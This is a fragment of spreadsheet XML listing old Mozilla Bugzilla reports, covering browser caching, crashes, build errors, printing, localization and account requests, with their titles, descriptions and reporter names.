 Requested Trust Indicators (email and/or SSL and/or code): The eCA signs subordinate CAs only. The validity of the certificate is usually checked only when the end entity wants to verify the trust path. The eCA itself is the trust anchor of its sub-CAs.</t>
  </si>
  <si>
    <t>CORE-103432</t>
  </si>
  <si>
    <t>(more) images fetched from server when they should be in the cache</t>
  </si>
  <si>
    <t>I noticed in the server logs that some images were being fetched from the 
server when they should already be in the cache. 
Test  : create a new profile collapse sidebar shutdown restart 
        run http://cowtools.mcom.com/page-loader/loader.pl through 11 cycles
Summary of images fetched from server (excluding those with ?query strings)
Note: most of these occur twice 200 OK for the same page up to 3 sec. apart!
First visit -- images pulled into cache
Second visit -- no redundant GET's               
Third visit --
  20:46:17 www.msn.com/res/AS_mickey1112.jpg                         200 1962
  20:46:18 www.msn.com/res/AS_mickey1112.jpg                         200 1962
  20:46:33 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:46:33 www.voodooextreme.com/res/images_comments.gif             200 1117
  20:46:35 www.voodooextreme.com/res/images_comments.gif             200 1117
  20:46:35 www.voodooextreme.com/res/_search.gif                     200 1496
  20:46:35 www.voodooextreme.com/res/images_alienware_promo.gif      200 9289
  20:46:35 www.voodooextreme.com/res/images_ew1.gif                  200 6644
  20:46:36 www.voodooextreme.com/res/images_shiny.gif                200 4506
  20:46:36 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:47:05 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
  20:47:07 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
Fourth visit --                                                      
  20:48:15 www.tomshardware.com/res/images_banner_cnet_searchbox.gif 200 2063
  20:48:15 www.tomshardware.com/res/images_banner_cnet_searchbox.gif 200 2063
Fifth visit --                                                       
  20:48:57 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:48:58 www.voodooextreme.com/res/images_comments.gif             200 1117
  20:48:59 www.voodooextreme.com/res/images_comments.gif             200 1117
  20:49:00 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:49:30 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
  20:49:32 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
Sixth visit -- no redundant GET's                                              
Seventh visit --                                                     
  20:51:28 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:51:30 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:52:08 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
  20:52:10 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
Eighth visit --                                                      
  20:52:41 www.msn.com/res/AS_mickey1112.jpg                         200 1962
  20:52:42 www.msn.com/res/AS_mickey1112.jpg                         200 1962
  20:52:59 www.voodooextreme.com/res/images_comments.gif             200 1117
  20:53:01 www.voodooextreme.com/res/images_comments.gif             200 1117
Ninth visit --                                                       
  20:54:22 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:54:24 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:55:00 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
  20:55:02 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
Tenth visit --                                                       
  20:55:30 www.msn.com/res/AL_thanksgiving1111.jpg                   200 4019
  20:55:31 www.msn.com/res/AL_thanksgiving1111.jpg                   200 4019
Eleventh visit                                                       
  20:57:22 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:57:22 www.voodooextreme.com/res/images_trans.gif                200 43
  20:57:25 www.voodooextreme.com/res/images_trans.gif                200 43
  20:57:25 www.voodooextreme.com/res/banners_LucyBanner2.gif         200 45369
  20:58:12 www.tomshardware.com/res/images_banner_cnet_searchbox.gif 200 2063
  20:58:13 www.tomshardware.com/res/images_banner_cnet_searchbox.gif 200 2063
  20:58:16 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
  20:58:18 www.cnn.com/res/images_0012_top_bush_3.jpg                200 22994
Cache information after test run (with one window open to about:cache)
Note: cache max settings were not exceeded (i.e. no eviction should have occurred)
Memory cache device
 Number of entries: 204
 Maximum storage size: 4194304 Bytes
 Storage in use: 3771820 Bytes
Disk cache device
 Number of entries: 1588
 Maximum storage size: 51200000 Bytes
 Storage in use: 27017728 Bytes
 Cache Directory: G:\Documents...  
Direct links to these images:
http://cowtools/perf/content/base/www.cnn.com/res/images_0012_top_bush_3.jpg   
http://cowtools/perf/content/base/www.msn.com/res/AL_thanksgiving1111.jpg      
http://cowtools/perf/content/base/www.msn.com/res/AS_mickey1112.jpg            
http://cowtools/perf/content/base/www.tomshardware.com/res/images_banner_cnet_searchbox.gif
http://cowtools/perf/content/base/www.voodooextreme.com/res/_search.gif        
http://cowtools/perf/content/base/www.voodooextreme.com/res/banners_LucyBanner2.gif
http://cowtools/perf/content/base/www.voodooextreme.com/res/images_alienware_promo.gif
http://cowtools/perf/content/base/www.voodooextreme.com/res/images_comments.gif
http://cowtools/perf/content/base/www.voodooextreme.com/res/images_ew1.gif     
http://cowtools/perf/content/base/www.voodooextreme.com/res/images_shiny.gif   
http://cowtools/perf/content/base/www.voodooextreme.com/res/images_trans.gif</t>
  </si>
  <si>
    <t>CORE-424390</t>
  </si>
  <si>
    <t>Implement MouseEvent.x / MouseEvent.y (for CSSOM View)</t>
  </si>
  <si>
    <t>Currently all browsers implement this property (which is essentially clientX and clientY renamed) save for Gecko:
http://www.quirksmode.org/dom/w3c_cssom.html#mousepos
Adding this would help improve cross-browser compatibility and help us comply with CSSOM:
http://www.w3.org/TR/cssom-view/</t>
  </si>
  <si>
    <t>ori</t>
  </si>
  <si>
    <t>NSS-184523</t>
  </si>
  <si>
    <t>support Solaris Packaging in NSS 3.3.3</t>
  </si>
  <si>
    <t>We need support for Solaris Packaging in NSS 3.3.3.
The differences between NSS_3_3_2_RTM and
NSS_3_3_2_SUN_PKG_BRANCH
NSS_3_3_2_RTM need to checked into
NSS_3_3_BRANCH.
Related bug: http://bugzilla.mozilla.org/show_bug.cgi?id=158683</t>
  </si>
  <si>
    <t>mhein</t>
  </si>
  <si>
    <t>TOOLKIT-384526</t>
  </si>
  <si>
    <t>Use sqlite3_prepare_v2 instead of sqlite3_prepare</t>
  </si>
  <si>
    <t>It has some useful optimizations but we'll have to change our code a bit.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-529156</t>
  </si>
  <si>
    <t>reclone try server repository</t>
  </si>
  <si>
    <t>Fetching a URL such as
http://tests.themasta.com/tinderboxpushlog/fetchraw.php?site=pushlog&amp;url=try/pushloghtml%3Fstartdate=12+hours+ago%26enddate=now
which redirects to the pushlog for that tree takes upwards of 45s -- it makes using tbpl on the try server almost unusable.  Any way that we can speed that up?</t>
  </si>
  <si>
    <t>CORE-336994</t>
  </si>
  <si>
    <t>Crash when window gets destroyed on SVGZoom event</t>
  </si>
  <si>
    <t>See upcoming testcase which crashes Mozilla on load. Also crashes in Firefox1.5.0.3.
Marking security sensitive just to be sure.
Talkback ID: TB18394613W
0x00000000
nsSVGSVGElement::DidModifySVGObservable   nsSVGValue::NotifyObservers   nsSVGValue::DidModify   XPTC_InvokeByIndex   XPCWrappedNative::CallMethod</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-195992</t>
  </si>
  <si>
    <t>Ability to hook into window opening and do your own thing</t>
  </si>
  <si>
    <t>In embedding situations the embedders may need to open non gecko windows when
encountering events or JS code that tries to open windows. There should be a way
to hook into the window opening mechanism and give embedders a chance to handle
it. The window watcher component seems like a likely spot. But would like to get
input as to a better place. I think bug 108455 is one example although not so
much an embedding example.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-409020</t>
  </si>
  <si>
    <t>Forum</t>
  </si>
  <si>
    <t>Most Popular Threads shows posts from the Contributors forum</t>
  </si>
  <si>
    <t>The Most Popular Threads and Most Recently Answered boxes show threads from the Contributor forum. 
Currently there's only one post: http://support.mozilla.com/tiki-view_forum_thread.php?forumId=3&amp;comments_parentId=1455</t>
  </si>
  <si>
    <t>CORE-135695</t>
  </si>
  <si>
    <t>[ps] Use /etc/printcap to set default printer names and commands</t>
  </si>
  <si>
    <t>I know the first response is going to be Use X-print. I'm sure Xprint is nice
but we use cups here which can be set to automatically generate an /etc/printcap
file.
My problem is this: I install mozilla for a group of about 20-30 people with
about a dozen print queue. Under the current system (as I understand it) I have
to change the global prefs.js adding in a line for the list of printers and then
add a line that tells mozilla to print on printer foo use the command lpr -P foo.
I have to remember to do this for every upgrade of mozilla (since they live in
their own directories on the cluster) and if I add a printer to the system I
have to remember to add it to mozilla too.
Please make mozilla generate these lpr -P foo and lpr -P bar commands
automatically. Then the user could modify them but at least give them a
starting point. 
I would imagine that this is an even bigger issue for people with bigger
installations than us (who don't use Xprint obviously).</t>
  </si>
  <si>
    <t>ewv</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-464154</t>
  </si>
  <si>
    <t>L10n repackages for hg release automation</t>
  </si>
  <si>
    <t>This bug can track all other bugs needed to be completed to have l10n repackages in parallel on release automation</t>
  </si>
  <si>
    <t>CORE-166147</t>
  </si>
  <si>
    <t>autoinitialize mRefCnt to 0</t>
  </si>
  <si>
    <t>I found a neat little trick from Essential COM to auto-set mRefCnt to 0 and
probably make the code a little faster:
struct nsAutoRefCnt {
    nsrefcnt mValue
    nsAutoRefCnt() : mValue(0) {}
    operator++() { ++mValue }
    operator--() { --mValue }
    operator=(PRInt32 aValue) { return (mValue = aValue) }
    operator PRInt32() { return mValue }
}
then I change the NS_DECL_ISUPPORTS to declare nsAutoRefCnt instead of nsrefcnt.
This makes sure that both the initialization happens and that it happens in the
constructor chain.. meaning smaller code size maybe even faster :)
Patch forthcoming.</t>
  </si>
  <si>
    <t>THUNDERBIRD-259259</t>
  </si>
  <si>
    <t>Messages visually disappearing when closing thread</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Thunderbird version 0.8 (20040913)
System: Windows 2000
Thunderbird version: 0.8 (20040913)
Reproduceable: yes
I see some strange behaviour related to thread sorting which I am able to
reproduce for a minimal test case with exactly one thread in one of my folders.
Sorting is set to Date/Ascending/Threaded and the thread is unfolded.
This thread should contain 5 mails (i.e. one original and 4 follow-ups). Only
the original and the first follow-up are displayed.
As soon as I manually close this thread the whole thread simply disappears and
won't come back until I switch to another folder and back. Then the original and
first follow-up mails are visible again.
Changing the view to Unthreaded will still show only the original and first
follow-up mail but after switching to another folder and back all the thread's
mails will suddenly be visible in their unthreaded order. Changing back to
Threaded all but the original and first follow-up will disappear again.
I also have a testbed with some more threads (chronologically after this bad
thread). Whenever collapsing/expanding the first (bad) thread parts of the
subsequent threads seem to get swallowed and disappear.
Yet after manually moving certain follow-up mails to another folder and back
everything works as expected all the time.
I have this minimal testbed as a separate folder file. So if need be I can
provide this to anyone who wants to take a look at this problem.
Kind regards
Sascha
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>MOZILLA.ORG-439279</t>
  </si>
  <si>
    <t>Create localizer LDAP/SVN account for Emmanuel Galatoulas</t>
  </si>
  <si>
    <t>Please create an LDAP account for:
Name: Emmanuel Galatoulas
Locale: el
email: galas@tee.gr
This user needs read/write SVN access via https with LDAP authentification to:
svn.mozilla.org/projects/mozilla-europe.org/trunk/{locale}
Thanks</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-302221</t>
  </si>
  <si>
    <t>Please add Proxy support to Minimo</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Minimo has a lot of potential but for too many people like me it's completely
useless at work where we have proxy servers.  Since Minimo doesn't seem to use
the default connection manager settings at least the proxy portion can proxy
support please be added?  Also it would be helpful if there was an option for
username/password for proxy connections.
Reproducible: Always</t>
  </si>
  <si>
    <t>fora</t>
  </si>
  <si>
    <t>SEAMONKEY-228594</t>
  </si>
  <si>
    <t>iframe's should not be allowed to load any parent document as a child iframe</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
If you have a file called fileAAA.html which has an iframe called
fileBBB.html which... either (i or ii)
i) contains an iframe sourcing fileAAA.html
or
ii) contains a subframe sourcing any parent document
You get an endless/ redundant loop.
(This is of course bad web programming but...)
Reproducible: Always
Steps to Reproduce:
1. create fileAAA.html with an iframe tag calling
2. (create) fileBBB.html with an iframe tag calling
3. (create) fileCCC.html with an iframe tag calling
4. fileAAA.html
Actual Results:  
Nesting nesting nesting...
Expected Results:  
Mozilla should check when loading an iframe that the source does not either
this' source or any *parent source* of this.
*parent source*  would be any file that contains and iframe sourcing 'this'
It didn't crash on my Win2K box but I'm guessing that a Win95/98 box might not
be so smart.  I'm not sure whether the nesting ever stopped or not and if so
by Mozilla or Windows.  All I know is that my Task Meter peaked then dropped
off after a second or two.</t>
  </si>
  <si>
    <t>scunliffe</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-443940</t>
  </si>
  <si>
    <t>create blogs.mozilla-europe.org and point it to l10n.mozilla.org/~pascalc/dotclear/</t>
  </si>
  <si>
    <t>I am creating a common blog for localizers who have been participating in creating mozilla europe website over the years where people will blog in English about what happens in their country.
I am hosting this blog on the localization server and I need the subdomain blogs.mozilla-europe.org to be created and point to l10n.mozilla-europe.org/~pascalc/dotclear/
Thanks</t>
  </si>
  <si>
    <t>TOOLKIT-303743</t>
  </si>
  <si>
    <t xml:space="preserve">typo in richlistbox.xml: </t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/seamonkey/source/toolkit/content/widgets/richlistbox.xml#330
Should be  I guess.</t>
  </si>
  <si>
    <t>CORE-21069</t>
  </si>
  <si>
    <t>Solid vs. Transparent Highlight</t>
  </si>
  <si>
    <t>________________________________
Overview Description:
Mozilla's transparent highlight looks cool but interferes with readability on
poorly designed sites.
Meaning if I'm on a site with a background that interferes with my reading the
text I highlight the text (white on dark blue in NS4) in order to read it
easier. Since the highlight in M11 inverts all the colors I cannot do this.
_________________________________
Steps to Reproduce:
1.) Open Gecko layout engine and open Sample Test #1
2.) Scroll to the bottom
3.) Highlight the H3 with the gear background and try to read it
_________________________________
Actual Results:
All colors are simply inverted
_________________________________
Suggested Results:
A highlight with two fixed contrasting colors
_________________________________
Build Date &amp; Platform Bug Found:
Milestone 11 on Windows NT</t>
  </si>
  <si>
    <t>MOZILLA.ORG-279061</t>
  </si>
  <si>
    <t xml:space="preserve">CVS account request for Alexei Volkov </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.2) Gecko/20040803
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.2) Gecko/20040803
Currently is working on adding crl generation into nss utils
Reproducible: Always</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-233658</t>
  </si>
  <si>
    <t>pmu.fr - main content is not visible</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040113
unable to display the main window as in IE
Reproducible: Always
Steps to Reproduce:
1. select Parier/ouvrir un compte
2.
3.
Actual Results:  
nothing</t>
  </si>
  <si>
    <t>jmreymond</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-225995</t>
  </si>
  <si>
    <t>crash in nsOSHelperAppService::GetValueString triggered by xmldoc.load()</t>
  </si>
  <si>
    <t>here's the stack
nsCharTraits::length(const unsigned short * 0x00000000) line 200
+ 5 bytes
nsCString::AppendWithConversion(const unsigned short * 0x00000000 int
0xffffffff) line 702 + 9 bytes
NS_LossyConvertUTF16toASCII::NS_LossyConvertUTF16toASCII(const unsigned short *
0x00000000) line 462
nsOSHelperAppService::GetValueString(HKEY__ * 0xc19e8eb0 unsigned short *
0x00000000 nsAString &amp; {...}) line 206 + 15 bytes
nsOSHelperAppService::GetByExtension(const char * 0x0069cb58 const char *
0x00000000) line 406 + 18 bytes
nsOSHelperAppService::GetMIMEInfoFromOS(const char * 0x00000000 const char *
0x0069cb58 int * 0x0069cabc) line 494 + 20 bytes
nsExternalHelperAppService::GetFromTypeAndExtension(nsExternalHelperAppService *
const 0x009a21cc const char * 0x00000000 const char * 0x0069cb58 nsIMIMEInfo
* * 0x0069cb18) line 2155 + 31 bytes
nsExternalHelperAppService::GetTypeFromExtension(nsExternalHelperAppService *
const 0x009a21cc const char * 0x0069cb58 char * * 0x0392a874) line 2251 + 42 bytes
nsExternalHelperAppService::GetTypeFromFile(nsExternalHelperAppService * const
0x009a21cc nsIFile * 0x0392a78c char * * 0x0392a874) line 2389 + 29 bytes
nsFileChannel::GetContentType(nsFileChannel * const 0x0392a2bc nsACString &amp;
{...}) line 301
nsDocument::StartDocumentLoad(nsDocument * const 0x039294a0 const char *
0x01e0e940 kLoadAsData nsIChannel * 0x0392a2bc nsILoadGroup * 0x00980e6c
nsISupports * 0x00000000 nsIStreamListener * * 0x0069d1c0 int 0x00000000
nsIContentSink * 0x00000000) line 751 + 16 bytes
nsXMLDocument::StartDocumentLoad(nsXMLDocument * const 0x039294a0 const char *
0x01e0e940 kLoadAsData nsIChannel * 0x0392a2bc nsILoadGroup * 0x00980e6c
nsISupports * 0x00000000 nsIStreamListener * * 0x0069d1c0 int 0x00000000
nsIContentSink * 0x00000000) line 618 + 37 bytes
nsXMLDocument::Load(nsXMLDocument * const 0x03929508 const nsAString &amp; {...}
int * 0x0069d370) line 533 + 72 bytes
PRBool found = GetValueString(hKey NULL description)
seems to be the offending call NULL being the bad child. That happens in 
nsOSHelperAppService.cpp:406 and other places. Not sure if the call is bad or
if GetValueString needs diapers.</t>
  </si>
  <si>
    <t>NSS-70713</t>
  </si>
  <si>
    <t>pk12util - tools test fail - 64 bit only</t>
  </si>
  <si>
    <t>charm.3 Exporting Alice's email cert &amp; key (pk12util -o) Failed
charm.3 Importing Alice's email cert &amp; key (pk12util -i) Failed
charm.4 Exporting Alice's email cert &amp; key (pk12util -o) Failed
charm.4 Importing Alice's email cert &amp; key (pk12util -i) Failed
same on raven and hbombaix (AIX) hp64.3 (HP-UX) y2sun2 and kentuckyderby (Solaris)
tools.sh: Tools Tests ===============================
tools.sh: Exporting Alice's email cert &amp; key------------------
pk12util -o Alice.p12 -n Alice -d ../alicedir -k ../tests.pw.8813 \
         -w ../tests.pw.8813
Converted from:
6e 73 73  0
Converted to:
 0 6e  0 73  0 73  0  0
Converted from:
6e 73 73  0
Converted to:
 0 6e  0 73  0 73  0  0
pk12util: add cert and key failed.
tools.sh: Importing Alice's email cert &amp; key -----------------</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-321938</t>
  </si>
  <si>
    <t>E4X</t>
  </si>
  <si>
    <t>XML and XMLList literals don't decompile correctly</t>
  </si>
  <si>
    <t>The following example should explain the problem clearly enough:
Parser.parse() the following:
{content}
Decompiler.decompile() result:
new .XML{content}
This is clearly wrong and won't eval.</t>
  </si>
  <si>
    <t>stryker330</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-468197</t>
  </si>
  <si>
    <t>Simplify / automate the addition of the pre-release suffix string (e.g. Alpha 1 Beta 2 etc.)</t>
  </si>
  <si>
    <t>Talked this over briefly with beltzner and joduinn... I've got most of this done already</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-182189</t>
  </si>
  <si>
    <t>Release Notes (1.0 ~ 1.3a) refers to expired evangelism page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021120
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021120
At the end of the section referred to there is a link to mozilla evangelism
specified as http://mozilla-evangelism.bclary.com/ - It should be
http://www.mozilla.org/projects/tech-evangelism/
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>owen.marshall+bmo</t>
  </si>
  <si>
    <t>Hans.A.Rosbach</t>
  </si>
  <si>
    <t>CORE-97983</t>
  </si>
  <si>
    <t>ExtractUrlPart allows no access to the directory part of the url</t>
  </si>
  <si>
    <t>ExtractUrlPart does not allow access to the directory part of an url. Also the
Start and Endpositions are sometimes calulated from the filebasename-string
although another part of the url is requested.</t>
  </si>
  <si>
    <t>CORE-288704</t>
  </si>
  <si>
    <t>Layout: Generated Content, Lists, and Counters</t>
  </si>
  <si>
    <t>[css-lists] Implement list numbering using a built-in 'list-item' counter</t>
  </si>
  <si>
    <t>Now that we implement counters (bug 3247) using them for list numbering would
fix a significant number of list numbering bugs that we have.
A patch containing some of the necessary code removal is in bug 3247 comment 57
(removed from all later patches).
The code that would need to be added would probably involve implementing
considerable parts of css3-content's proposals for list handling using -moz-
prefixes.  Note that we probably don't want to use counters for
disc/square/circle/none types since we probably want to keep the customized
drawing code that we use for them.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-429031</t>
  </si>
  <si>
    <t>Expose more information about precision and signedness via Dehydra Javascript interface</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Build Identifier: 
GCC provides several important pieces of information which are not exposed for scripting via Javascript in Dehydra:
1) TYPE_MIN_VALUE
2) TYPE_MAX_VALUE
3) TYPE_PRECISION
4) TYPE_UNSIGNED
These fields are vital for static analysis of C++ code for security purposes.  Exposing these fields to Javascript would allow some important questions to be answered in script.
Commonly asked questions during a security code review:
-&gt; Where are all the instances of assigning an unsigned value to a signed type?
   For example:
       unsigned int ui = 0xFFFFFFFF
       int i = ui
-&gt; Where are all the instances of truncation (data-loss) via assignment?
   For example:
      int i = 99999
      short s = i
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>bk2</t>
  </si>
  <si>
    <t>CORE-73446</t>
  </si>
  <si>
    <t>Need to know how to convert between local encoding and UCS2 e.g. Need NS_ConvertUCS2ToLocalEncoding() and NS_ConvertLocalEncodingToUCS2()</t>
  </si>
  <si>
    <t>(Based on discussion on IRC #mozilla with scc):
There's need for a fucntion which converts a PRUnichar * to a char * in
system's local encoding - whatever it is (en_US.UTF-8 ja.UTF-8 xzy.UTF-123).
Example usage would be a function which get's a document title for printing
(which is a PRUnichar *title) and likes to feed it to /usr/bin/lp -t $MYTITLE
- which is called via a function like lpPrintSetTitle( x y const char *title )
where title must be in system's locale...</t>
  </si>
  <si>
    <t>FIREFOX-402240</t>
  </si>
  <si>
    <t>[RTL] Need a better way to control the statusbar direction</t>
  </si>
  <si>
    <t>Created attachment 287123
Current broken Minefield LTR status bar (screenshot with caption)
Text in Hebrew Minefield apper wrong in the status bar due to the fact that we want it to be LTR for URLs but RTL for Status text Waiting for.... 
Previous versions has #statusbar-display{
direction: ltr !important} in intl.css but this seem to break the status messages.</t>
  </si>
  <si>
    <t>CORE-299533</t>
  </si>
  <si>
    <t>hang when selecting across select dropdown arrow</t>
  </si>
  <si>
    <t>firefox linux trunk 20050702 xft and pango hang when selecting across select
dropdown arrow (not on all pages)</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-474396</t>
  </si>
  <si>
    <t>Add OpenID support to spreadthunderbird.com</t>
  </si>
  <si>
    <t>That will leverage the barrier of creating yet another sets of credentials might lower the barrier for some people to join the effort.</t>
  </si>
  <si>
    <t>NSS-135821</t>
  </si>
  <si>
    <t>PK11_WrapPrivKey() may leak a slot reference</t>
  </si>
  <si>
    <t>PK11_WrapPrivKey() calls PK11_GetInternalSlot() under
some conditions but this slot reference is not freed.</t>
  </si>
  <si>
    <t>CORE-89267</t>
  </si>
  <si>
    <t>unicode (mozilla 9.1) regression braile not displayed</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.2+) Gecko/20010704
BuildID:    2001070408
Under 0.9.1 the braille&amp; Runes is displayed correctly
Under this nightly build it is displayed as ???????
(run both browers together so it easy to see the differences)
Reproducible: Always
Steps to Reproduce:
1.open http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-demo.txt
2.and you will see the section marked braile displayed as ??????
This page crashed under bug 88752/88486</t>
  </si>
  <si>
    <t>pg133</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-410269</t>
  </si>
  <si>
    <t>Add ko locale key pages</t>
  </si>
  <si>
    <t>I want to translate ko locale key pages such as index.html products/* support/* and about/*.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-225805</t>
  </si>
  <si>
    <t>build error: build.dtd not found</t>
  </si>
  <si>
    <t>make clean removes mozilla/toolkit/locale/build.dtd.
But it's not created anymore from build.dtd.in.
So the build fails with a file not found error:
make[4]: Entering directory `/cygdrive/g/mozilla/mozilla/toolkit/locale'
+++ making chrome /cygdrive/g/mozilla/mozilla/toolkit/locale  =&gt;
../../dist/bin/chrome/en-US.jar
+++ adding chrome ../../dist/bin/chrome/installed-chrome.txt
+++     localeinstallurljar:resource:/chrome/en-US.jar!/locale/en-US/global/
file not found:
/cygdrive/g/mozilla/mozilla/toolkit/locale/locale/en-US/global/build.dtd at
/cygdrive/g/mozilla/mozilla/config/make-jars.pl
line 351  line 7.
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/g/mozilla/mozilla/toolkit/locale'
make[3]: *** [libs] Error 2
make[3]: Leaving directory `/cygdrive/g/mozilla/mozilla/toolkit'
make[2]: *** [tier_50] Error 2
make[2]: Leaving directory `/cygdrive/g/mozilla/mozilla'
make[1]: *** [default] Error 2
make[1]: Leaving directory `/cygdrive/g/mozilla/mozilla'
make: *** [build] Error 2
Workaround: in mozilla/toolkit: make locale/build.dtd creates the file. Then
you can do a depend build.
My mozconfig:
export MOZ_PHOENIX=1
mk_add_options MOZ_PHOENIX=1
ac_add_options --disable-ldap
ac_add_options --disable-mailnews
ac_add_options
--enable-extensions=cookiexml-rpcxmlextrasp3ppreftransformiixuniversalchardettypeaheadfindwebservicesinspector
ac_add_options --enable-crypto
ac_add_options --disable-composer
ac_add_options --disable-profilesharing
ac_add_options --disable-tests
ac_add_options --disable-debug
ac_add_options --enable-optimize=-Oxs -G7 -arch:SSE
ac_add_options --disable-shared
ac_add_options --enable-static</t>
  </si>
  <si>
    <t>BUGZILLA-258712</t>
  </si>
  <si>
    <t>Whining</t>
  </si>
  <si>
    <t>whine.pl should honour emailsuffix</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de-DE rv:1.7) Gecko/20040707 Firefox/0.9.2
Build Identifier: Bugzilla 2.19
This is a follow-up bug of bug 256762.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-372098</t>
  </si>
  <si>
    <t>HTML links with target= should use the base target</t>
  </si>
  <si>
    <t>Steps to reproduce:
- Go to http://tuinbouw.startkabel.nl/
- Click on a link like Floranet (it should open the link in a new tab)
- Watch the location bar
- Click Reload
Result: page returns to http://tuinbouw.startkabel.nl/
It does the same when you click Back and it also listens to Forward.
This happens on all daughter pages of Startkabel. Not sure if this is an evangelism bug. No reduced testcase.</t>
  </si>
  <si>
    <t>CORE-378407</t>
  </si>
  <si>
    <t>[FIX]Plaintext serialization of  should always add quotes</t>
  </si>
  <si>
    <t>Created attachment 262464
Proposed change
Right now we do this only when nsIDocumentEncoder::OutputFormatted is set.  But unlike the other formatting (* * for bold _ _ for underline etc) that we can output quotes should really be added to  unconditionally these characters are not just a convention to indicate bolding or underlining but what  really _means_.
As a side effect a selection that actually contains part of a  will put quotes around that part when pasted into a plaintext context.  This is imo desirable.
Note that this is NOT a duplicate of bug 12460.  That kettle of fish is something else entirely.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-100824</t>
  </si>
  <si>
    <t>mackichan.com - Page displays incorrectly table at bottom displays at top</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:0.9.3) Gecko/20010801
BuildID:    2001080110
In IE 5.5 and  Netscape 4.7 the table is at bottom of the page whereas in Moz
it appears at the top and overwrites some other text. I looked at the HTML but
I'm not sure what the problem is.
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.mackichan.com/techtalk/UserForums.htm
2.
3.</t>
  </si>
  <si>
    <t>r-mcdonald</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-404602</t>
  </si>
  <si>
    <t>Need to deploy a new file to developer.mozilla.org site</t>
  </si>
  <si>
    <t>I just checked in newsletter/subscribe.html to the devmo SVN.  Could we please get this deployed to the live site?  Thanks!</t>
  </si>
  <si>
    <t>TOOLKIT-290390</t>
  </si>
  <si>
    <t>Deer Park - Software Update</t>
  </si>
  <si>
    <t>Tracking bug for Deer Park release</t>
  </si>
  <si>
    <t>cdbordelon</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-160027</t>
  </si>
  <si>
    <t>Import from Outlook Express: Lost Mark as read information</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.0) Gecko/20020530
BuildID:    2002053012
When I imported mail folders from Outlook Express all the e-mail got the little
green diamond indicating unread even though I had marked most of them as
read in Outlook Express.</t>
  </si>
  <si>
    <t>elihandel</t>
  </si>
  <si>
